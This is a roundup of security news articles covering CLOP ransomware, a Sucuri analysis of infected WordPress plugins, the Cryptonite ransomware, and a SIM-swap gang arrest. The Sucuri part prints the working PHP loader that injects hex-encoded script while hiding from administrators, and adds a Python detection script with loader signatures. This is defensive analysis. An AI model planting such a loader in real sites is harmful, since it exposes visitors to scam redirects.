While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:

  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.

While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders.

As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take.

“Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”

Source: https://krebsonsecurity.com/2022/12/new-ransom-payment-schemes-target-executives-telemedicine/

Infected WordPress Plugins Redirect to Push Notification Scam

Attackers are always finding unique ways to avoid detection. Our teams regularly find malware on compromised websites which have been obfuscated to make it more difficult for webmasters to detect or understand. Obfuscation can take many forms, such as encrypting code or using complex algorithms to hide the true nature of the malicious contents. For example, many malware samples we detect are encoded into base64 to confuse website owners and evade detection.

But during a recent investigation, I stumbled across a rather interesting piece of malware using a more complex form of obfuscation. Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.

Let’s take a closer look.

Unwanted redirects to fake captcha scam

A new client was complaining that whenever a site visitor clicked anywhere on their website, a browser tab was opened which redirected the victim to the following spammy web page: hxxps://1.guesswhatnews[.]com/not-a-robot/index.html

Figure: Fake captcha displayed to redirected website visitors.

The spam website was resolving to an IP address (https://urlscan.io/ip/45.133.44.20) employed by a shady ad network mainly used for porn websites.

An inspection of the compromised web page revealed a malicious JavaScript injection as the source of the redirect, which had been injected into random plugin files on the compromised website.

Malicious JavaScript injected into WordPress plugins via _inc.tmp

As it turns out, our remediation teams have recently noticed an influx of tickets for WordPress websites that have the following code injected into random plugins:

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
    add_action('wp_head', 'get_hex_cache', 12);

    function get_hex_cache()
    {
        return print(@hex2bin('3c7' . (file_get_contents(__DIR__ . '/_inc.tmp'))));
    }
}

This PHP code injects the decoded contents of _inc.tmp (found in the same plugin directory) into the header section of the site’s WordPress pages.

To accomplish this, it adds the get_hex_cache function to the wp_head hook. This hook is only added once, even when more than one plugin is infected. It’s also worth noting that the malware is not activated for site administrators.

The _inc.tmp file contains a 51Kb-long sequence of digits.

It’s a hexadecimally encoded binary string. The malware prepends 3c7 to the string and decodes it using the hex2bin PHP function.

The decoded results contain a <script> tag populated with obfuscated JavaScript code, which is injected into WordPress pages.

Figure: Example of the injected malicious JavaScript.

The code begins with "function _0x18b4(){const _0x188f70=". Yet another interesting feature of this injection is the data-group="lists" attribute of the script tag. A quick check with PublicWWW revealed over 170 websites infected with this particular piece of malware (at the time of writing).

Furthermore, the script adds a listener to the whole page’s onclick event. Whenever a site visitor clicks on any link, it changes the link to hxxps://1.guesswhatnews[.]com/not-a-robot/index.html?var=siteid&ymid=clickid&rc=0&mrc=3&fsc=0&zoneid=1947429&tbz=1947431
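The loader and payload described above leave a recognisable footprint on disk. The following triage script is an added example, not Sucuri's code: it walks a plugin directory, flags PHP files carrying the `get_hex_cache` / `wp_head` loader, and decodes any `_inc.tmp` the same way the loader does (prepend `3c7`, then hex-decode) so the injected `<script>` can be inspected offline. The plugin tree, loader text and payload it scans are constructed inside the script for the demo.

```python
"""Triage helper for the _inc.tmp / get_hex_cache plugin injection.

Added example (not the original post's code). Every file scanned below is
constructed in a temporary directory so the script runs offline.
"""
import re
import tempfile
from pathlib import Path
from typing import Optional

# Signatures of the loader shown in the post: the wp_head hook registration and
# the hex2bin() call that glues '3c7' onto a file read from the plugin directory.
LOADER_PATTERNS = [
    re.compile(r"add_action\(\s*['\"]wp_head['\"]\s*,\s*['\"]get_hex_cache['\"]"),
    re.compile(r"hex2bin\(\s*['\"]3c7['\"]\s*\.\s*\(?file_get_contents\("),
]
PAYLOAD_NAME = "_inc.tmp"


def decode_payload(hex_digits: str) -> Optional[bytes]:
    """Reproduce the loader's decoding step: prepend '3c7', then hex-decode.
    Returns None when the content cannot be a payload of this family."""
    data = "3c7" + hex_digits.strip()
    if len(data) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", data):
        return None
    return bytes.fromhex(data)


def looks_like_injected_script(decoded: bytes) -> bool:
    # The decoded payload opens a <script> tag carrying data-group="lists".
    head = decoded[:200].lower()
    return head.startswith(b"<script") and b'data-group="lists"' in head


def scan_plugins(root: str) -> dict:
    """Return {'loaders': [php paths], 'payloads': [(path, decoded prefix)]}."""
    findings = {"loaders": [], "payloads": []}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.name == PAYLOAD_NAME:
            decoded = decode_payload(path.read_text(errors="ignore"))
            if decoded is not None and looks_like_injected_script(decoded):
                findings["payloads"].append(
                    (str(path), decoded[:60].decode("ascii", "replace")))
        elif path.suffix == ".php":
            src = path.read_text(errors="ignore")
            if any(p.search(src) for p in LOADER_PATTERNS):
                findings["loaders"].append(str(path))
    return findings


def build_demo_tree() -> str:
    """Constructed plugin tree: one clean plugin and one infected plugin."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    clean = Path(root, "clean-plugin")
    clean.mkdir()
    clean.joinpath("clean-plugin.php").write_text(
        "<?php\nadd_action('wp_head', 'clean_header');\n")
    bad = Path(root, "infected-plugin")
    bad.mkdir()
    loader = ("<?php\nif ((is_admin() || (function_exists('get_hex_cache'))) !== true) {\n"
              "    add_action('wp_head', 'get_hex_cache', 12);\n"
              "    function get_hex_cache() {\n"
              "        return print(@hex2bin('3c7' . (file_get_contents(__DIR__ . '/_inc.tmp'))));\n"
              "    }\n}\n")
    bad.joinpath("infected-plugin.php").write_text(loader)
    # Harmless stand-in for the obfuscated script; hex('<s') == '3c73', so the
    # on-disk file is the full hex string minus the '3c7' the loader re-adds.
    script = '<script data-group="lists">function _0x18b4(){const _0x188f70=[];}</script>'
    bad.joinpath(PAYLOAD_NAME).write_text(script.encode().hex()[3:])
    return root


if __name__ == "__main__":
    result = scan_plugins(build_demo_tree())
    print("loader files :", result["loaders"])
    print("payload files:", result["payloads"])
```

Because the loader skips administrators, confirm a suspected infection by fetching a page as a logged-out visitor rather than from the admin session.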

Evading detection from dev tools

To hide the malicious activity from prying eyes, the script doesn’t do anything if it detects open Developer Tools. We’ve seen this behavior quite often in MageCart malware, however this script uses a more complex approach to detecting dev tools which relies on multiple alternative methods.

Here is a list of some of the function names this malware uses to make these checks:

  • checkByImageMethod
  • checkDevByScreenResize
  • detectDevByKeyboard
  • checkByFirebugMethod
  • checkByProfileMethod

Figure: Malware detects developer tools.

Whenever the malware detects that dev tools are open, the redirect doesn’t occur, which makes the malicious behavior much harder to find upon inspection.

Mitigation Steps

Obfuscation can make it challenging for website owners to detect or pinpoint the source of malicious behavior on their website. Fortunately, a number of free and paid tools exist to help monitor for indicators of compromise.

Let’s take a look at some of the ways you can mitigate risk of infection for your website.

  • Scan your website for malware regularly and keep an eye out for infections at both the client and server level.
  • Install the latest software updates and patches for your website as soon as they become available. That includes core CMS, plugins, themes, and other extensible components.
  • Leverage a web application firewall to virtually patch known vulnerabilities, block bad bots, and mitigate brute force attacks.
  • Harden your website by restricting access to admin pages and using strong, unique passwords for all of your website’s accounts.
  • Use file integrity monitoring to detect any unexpected changes in your environment.

Source: https://blog.sucuri.net/2022/12/infected-wordpress-plugins-redirect-to-push-notification-scam.html

This broken ransomware can’t decrypt your files, even if you pay the ransom

Researchers warn this badly built ransomware will destroy your files, so don’t pay up.

Victims of a recently uncovered form of ransomware are being warned not to pay the ransom demand, simply because the ransomware isn’t able to decrypt files – it just destroys them instead. 

Coded in Python, Cryptonite ransomware first appeared in October as part of a free-to-download open-source toolkit – available to anyone with the skills required to deploy it in attacks against Microsoft Windows systems, with phishing attacks believed to be the most common means of delivery.

But analysis of Cryptonite by cybersecurity researchers at Fortinet has found that the ransomware only has “barebones” functionality and doesn’t offer a means of decrypting files at all, even if a ransom payment is made. 

Instead, Cryptonite effectively acts as wiper malware, destroying the encrypted files, leaving no way of retrieving the data. 

But rather than this being an intentionally malicious act of destruction by design, researchers suggest that the reason Cryptonite does this is because the ransomware has been poorly put together.  

A basic design and what’s described as a “lack of quality assurance” mean the ransomware doesn’t work correctly: because of a flaw in the way it’s been put together, if Cryptonite crashes or is simply closed, there is no way to recover the encrypted files.

There’s also no way to run it in decryption-only mode – so every time the ransomware is run, it re-encrypts everything with a different key. This means that, even if there was a way to recover the files, the unique key probably wouldn’t work – leaving no way to recover the encrypted data. 

“This sample demonstrates how a ransomware’s weak architecture and programming can quickly turn it into a wiper that does not allow data recovery,” said Gergely Révay, security researcher at Fortinet’s FortiGuard Labs. 

“Although we often complain about the increasing sophistication of ransomware samples, we can also see that oversimplicity and a lack of quality assurance can also lead to significant problems,” he added. 

It’s the victim of the ransomware attack that feels those problems, as they’re left with no means of restoring their network – even if they’ve made a ransom payment.  

The case of Cryptonite ransomware also serves as a reminder that paying a ransom is never a guarantee that the cyber criminals will provide a decryption key, or that it will work properly if they do.

Cyber agencies, including CISA, the FBI and the NCSC, recommend against paying the ransom because it only serves to embolden and encourage cyber criminals, particularly if they can acquire ransomware at a low cost or for free. 

The slightly good news is that it’s now harder for wannabe cyber criminals to get their hands on Cryptonite, as the original source code has been removed from GitHub. 

In addition to this, the simple nature of the ransomware also means that it’s easy for antivirus software to detect – so it’s recommended antivirus software is installed and kept up to date. 

Source: https://www.zdnet.com/article/this-badly-made-ransomware-cant-decrypt-your-files-even-if-you-pay-the-ransom/

Police arrest 55 members of ‘Black Panthers’ SIM Swap gang

The Spanish National Police have arrested 55 members of the ‘Black Panthers’ cybercrime group, including one of the organization’s leaders based in Barcelona.

The gang had a very organized structure and was operating four specialized activity cells dedicated to social engineering, vishing (voice phishing), phishing, and carding.

The arrested leader coordinated the cells and recruited new members and money mules.

“The criminal group consisted of a network structure, made up of interconnected and perfectly defined action cells, whose division of tasks dealt with knowledge, accessibility to stolen information, and experience,” reads the police’s announcement.

The ultimate goal of the gang was to perform SIM swapping attacks, in which a target’s phone number is ported to the attacker’s device. By porting the number, the attackers gain access to the victim’s text messages and can use them to bypass 2FA protection on their bank accounts and empty them.

For the SIM swapping, the fraudsters used a combination of phishing, vishing, and call forwarding to impersonate the identities of their targets when talking to mobile service provider customer support agents.

In some cases, the scammers even acted as service technicians for local reseller offices of the targeted telecom firms, stealing the account credentials of their employees.

“This gave them access to the database of the telephone operators themselves and allowed them to obtain the personal data of the victims, making duplicate SIM cards themselves.” – Policía Nacional.

Once they got access to the bank accounts of their targets, they made multiple transfers to a network of “money mules” located on the Levantine coast.

According to the investigators’ estimates, ‘Black Panthers’ managed to defraud at least 100 victims before their arrest, stealing 250,000 euros ($260,000) in the process.

The police’s investigation also revealed that the ‘Black Panther’ gang had an active presence on the dark web, where their “carding” cell bought ID and credit card numbers using cryptocurrency.

The crooks used the purchased info to buy various luxury products from online shops and then resell them as second-hand items to unsuspecting buyers, effectively laundering the money.

During the police raids in seven homes, 45 SIM cards, 11 mobile phones, four laptops, a hardware cryptocurrency wallet, and plenty of documentation relating to the crimes were found and confiscated.

Source: Police arrest 55 members of ‘Black Panthers’ SIM Swap gang (bleepingcomputer.com)